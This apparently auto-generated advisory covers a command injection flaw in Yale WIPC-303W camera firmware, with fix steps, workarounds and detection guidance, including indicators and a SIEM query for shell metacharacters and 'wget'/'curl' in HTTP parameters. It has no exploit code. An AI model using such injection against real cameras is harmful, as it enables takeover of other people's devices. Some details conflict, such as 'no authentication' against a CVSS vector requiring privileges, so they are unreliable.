CVE-2020-23826 – This vulnerability allows remote attackers to e... (How to Fix)

Q: What is the severity of CVE-2020-23826?

CVE-2020-23826 has a CVSS score of 8.8 (HIGH). This vulnerability allows remote attackers to execute arbitrary commands on Yale WIPC-303W IP cameras through command injection in the HTTP API. Attackers can gain full control of affected devices without authentication. This affects Yale WIPC-303W cameras running firmware versions 2.21 through 2.31.

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary commands on Yale WIPC-303W IP cameras through command injection in the HTTP API. Attackers can gain full control of affected devices without authentication. This affects Yale WIPC-303W cameras running firmware versions 2.21 through 2.31.

💻 Affected Systems

Products:

Yale WIPC-303W IP Camera

Versions: 2.21 through 2.31

Operating Systems: Embedded Linux

Default Config Vulnerable: ⚠️ Yes

Notes: May also affect related Yale camera models. Note potential duplicate with CVE-2020-10176.

📦 What is this software?

Yale Wipc 303w Firmware by Assaabloy

View all CVEs affecting Yale Wipc 303w Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device takeover allowing attackers to install persistent malware, pivot to internal networks, disable security features, or use cameras for botnet participation.

🟠

Likely Case

Unauthorized access to camera feeds, device configuration changes, credential theft, and potential lateral movement to other network devices.

🟢

If Mitigated

Limited impact if cameras are isolated on separate VLANs with strict network segmentation and access controls.

🌐 Internet-Facing: HIGH - Directly exposed cameras can be exploited by any internet-based attacker without authentication.

🏢 Internal Only: MEDIUM - Requires internal network access but exploitation is straightforward once network access is obtained.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation requires sending specially crafted HTTP requests to the camera's API endpoints. Public exploit code and technical details are available in the referenced reports.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Firmware version 2.32 or later

Vendor Advisory: https://www.yalehome.com/support/security-advisories

Restart Required: Yes

Instructions:

1. Download latest firmware from Yale support portal. 2. Access camera web interface. 3. Navigate to System > Maintenance > Upgrade. 4. Upload firmware file. 5. Wait for automatic reboot.

🔧 Temporary Workarounds

Network Segmentation

all

Isolate cameras on separate VLAN with strict firewall rules blocking all inbound traffic except from authorized management systems.

HTTP API Restriction

all

Block access to camera HTTP API endpoints from untrusted networks using firewall rules or web application firewall.

🧯 If You Can't Patch

Disable remote access and ensure cameras are only accessible from internal management networks
Implement strict network monitoring for unusual HTTP requests to camera IP addresses

🔍 How to Verify

Check if Vulnerable:

Check firmware version via web interface at System > Information > Firmware Version. If version is between 2.21 and 2.31 inclusive, device is vulnerable.

Check Version:

curl -s http://[CAMERA_IP]/cgi-bin/version.cgi | grep Firmware

Verify Fix Applied:

Verify firmware version shows 2.32 or higher after update. Test HTTP API endpoints with known safe payloads to confirm command injection is no longer possible.

📡 Detection & Monitoring

Log Indicators:

Unusual HTTP POST requests to API endpoints
Commands like 'ping', 'wget', 'curl' in HTTP parameters
Multiple failed authentication attempts followed by successful API calls

Network Indicators:

HTTP requests containing shell metacharacters (;, |, &, $)
Outbound connections from cameras to unexpected external IPs
Unusual traffic patterns from camera to internal systems

SIEM Query:

source="camera_logs" AND (http_uri="/cgi-bin/*" AND http_method="POST") AND (http_query CONTAINS ";" OR http_query CONTAINS "|" OR http_query CONTAINS "&")

📊 Metadata

CVE ID: CVE-2020-23826

CVSS v3 Score: 8.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

Published: January 26, 2021

Last Updated: November 21, 2024

🔗 References

https://firedome.io/blog/firedome-discloses-0-day-vulnerabilities-in-yale-ip-cameras/ Third Party Advisory
https://lp.firedome.io/hubfs/Yale%20WIPC-301W%20RCE%20Vulnerability%20Report%205-6.pdf Exploit,Third Party Advisory
https://whiterosezex.blogspot.com/2021/01/cve-2020-23826-rce-vulnerability-in.html Third Party Advisory
https://firedome.io/blog/firedome-discloses-0-day-vulnerabilities-in-yale-ip-cameras/ Third Party Advisory
https://lp.firedome.io/hubfs/Yale%20WIPC-301W%20RCE%20Vulnerability%20Report%205-6.pdf Exploit,Third Party Advisory
https://whiterosezex.blogspot.com/2021/01/cve-2020-23826-rce-vulnerability-in.html Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-23826, you might also want to check these: